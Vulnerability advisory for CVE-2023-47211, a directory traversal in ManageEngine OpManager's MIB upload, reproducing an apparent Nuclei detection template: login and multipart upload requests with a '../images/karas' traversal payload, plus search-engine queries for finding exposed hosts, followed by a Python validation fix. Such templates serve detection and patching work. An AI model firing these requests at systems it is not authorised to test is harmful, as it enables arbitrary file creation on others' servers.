
ManageEngine OpManager - Directory Traversal

Published: 2024-01-13 09:35:55
Source: ProjectDiscovery (github.com)
Tags: manageengine, zoho, directory traversal, arbitrary file creation, lfi, authenticated, intrusive, cvss8.6

CVSS3: 9.1 High

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: LOW
Availability Impact: LOW

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

AI Score: 8.9 High (Confidence: High)

EPSS: 0.001 Low (Percentile: 36.5%)

A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MIB file to trigger this vulnerability.

id: CVE-2023-47211

info:
  name: ManageEngine OpManager - Directory Traversal
  author: gy741
  severity: high
  description: |
    A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47211
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
    cvss-score: 8.6
    cve-id: CVE-2023-47211
    cwe-id: CWE-22
    epss-score: 0.00164
    epss-percentile: 0.52964
    cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: zohocorp
    product: manageengine_firewall_analyzer
    shodan-query:
      - "http.title:\"OpManager Plus\""
      - http.title:"opmanager plus"
    fofa-query: title="opmanager plus"
    google-query: intitle:"opmanager plus"
  tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp

http:
  - raw:
      - |
        POST /two_factor_auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}

      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN


        IMPORTS
            enterprises
                FROM RFC1155-SMI;

        microsoft       OBJECT IDENTIFIER ::= { enterprises 311 }
        software        OBJECT IDENTIFIER ::= { microsoft 1 }
        systems         OBJECT IDENTIFIER ::= { software 1 }
        os              OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT       OBJECT IDENTIFIER ::= { os 1 }
        windows         OBJECT IDENTIFIER ::= { os 2 }
        workstation     OBJECT IDENTIFIER ::= { windowsNT 1 }
        server          OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc              OBJECT IDENTIFIER ::= { windowsNT 3 }

        END

        -----------------------------372334936941313273904263503262--

      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN


        IMPORTS
            enterprises
                FROM RFC1155-SMI;

        microsoft       OBJECT IDENTIFIER ::= { enterprises 311 }
        software        OBJECT IDENTIFIER ::= { microsoft 1 }
        systems         OBJECT IDENTIFIER ::= { software 1 }
        os              OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT       OBJECT IDENTIFIER ::= { os 1 }
        windows         OBJECT IDENTIFIER ::= { os 2 }
        workstation     OBJECT IDENTIFIER ::= { windowsNT 1 }
        server          OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc              OBJECT IDENTIFIER ::= { windowsNT 3 }

        END

        -----------------------------372334936941313273904263503262--

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "MIBFile with same name already exists")'
        condition: and

    extractors:
      - type: regex
        name: x_zcsrf_token
        group: 1
        part: header
        regex:
          - 'Set-Cookie: opmcsrfcookie=([^;]{50,})'
        internal: true
# digest: 490a0046304402207463b57de77e273b29f35ef339d53a9d18d09b98c545fbfb4a406e3f06c8ce3b0220333ec1305069fb86c3b10d5887bdf0152765f1cf7b49c2907697875e3c10563c:922c64590222798bb761d5b6d8e72950
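
A server-side check for the flaw this template probes, as an added example that is not part of the template or of OpManager's code. It assumes the stored file name is derived from the module name on the MIB's `DEFINITIONS ::= BEGIN` line, as the `../images/karas` payload suggests; `safe_mib_destination`, `RejectedUpload`, `check` and the `/opt/app/mibs` directory are hypothetical names.

```python
import re
from pathlib import Path

# ASN.1 module reference: uppercase letter, then letters/digits/single hyphens.
MODULE_NAME = re.compile(r"[A-Z][A-Za-z0-9]*(?:-[A-Za-z0-9]+)*")
# The first token before "DEFINITIONS ::= BEGIN" is the declared module name.
HEADER = re.compile(r"^\s*(\S+)\s+DEFINITIONS\s*::=\s*BEGIN", re.MULTILINE)


class RejectedUpload(ValueError):
    """Raised when an uploaded MIB must not be written to disk."""


def safe_mib_destination(mib_text: str, mib_dir: Path) -> Path:
    """Return the path a MIB may be stored at, or raise RejectedUpload."""
    match = HEADER.search(mib_text)
    if match is None:
        raise RejectedUpload("no 'DEFINITIONS ::= BEGIN' header found")
    name = match.group(1)
    # Allow-list check: rejects '/', '\\', '..', NUL and anything else unusual.
    if not MODULE_NAME.fullmatch(name) or len(name) > 64:
        raise RejectedUpload(f"invalid module name: {name!r}")
    base = mib_dir.resolve()
    dest = (base / name).resolve()
    # Defence in depth: the resolved path must still sit directly in mib_dir.
    if dest.parent != base:
        raise RejectedUpload(f"destination escapes MIB directory: {dest}")
    return dest


# Constructed samples: the header line used by the template, and a benign one.
TRAVERSAL_SAMPLE = "../images/karas DEFINITIONS ::= BEGIN\nIMPORTS enterprises FROM RFC1155-SMI;\nEND\n"
BENIGN_SAMPLE = "EXAMPLE-MIB DEFINITIONS ::= BEGIN\nIMPORTS enterprises FROM RFC1155-SMI;\nEND\n"


def check(mib_text: str, mib_dir: str = "/opt/app/mibs") -> str:
    """Return 'accepted:<file name>' or 'rejected:<reason>' for a sample."""
    try:
        return "accepted:" + safe_mib_destination(mib_text, Path(mib_dir)).name
    except RejectedUpload as exc:
        return "rejected:" + str(exc)


if __name__ == "__main__":
    print(check(TRAVERSAL_SAMPLE))
    print(check(BENIGN_SAMPLE))
```

The allow-list on the module name does the real work; the resolved-path comparison only catches cases the name check might miss, such as a symlink already present in the MIB directory.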
